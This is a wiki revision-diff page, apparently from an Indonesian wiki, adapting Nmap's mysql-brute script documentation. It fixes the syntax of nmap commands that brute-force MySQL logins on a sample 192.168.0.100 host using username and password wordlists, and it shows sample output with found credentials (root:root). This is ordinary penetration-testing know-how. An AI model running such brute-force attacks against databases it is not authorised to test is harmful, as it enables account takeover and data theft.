Difference between revisions of "Nmap: brute force hack mysql password"

From OnnoWiki
Jump to navigation Jump to search
Line 33: Line 33:
  
 
  nmap --script=mysql-brute <target>
 
  nmap --script=mysql-brute <target>
  Nmap  -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/user.txt 192.168.0.100
+
  Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt 192.168.0.100
  Nmap  -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/user.txt passdb=/root/pass.txt 192.168.0.100
+
  Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.100
  
 
==Script Output==
 
==Script Output==

Revision as of 06:55, 2 June 2018

Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html


File mysql-brute

Script types: portrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/mysql-brute.nse

User Summary

Lakukan hack pada password MySQL.


Example Usage

isi

user.txt
admin
root
dll

isi

pass.txt
123456
123456789
dll


nmap --script=mysql-brute <target>
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt 192.168.0.100
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.100

Script Output

3306/tcp open  mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials

Referensi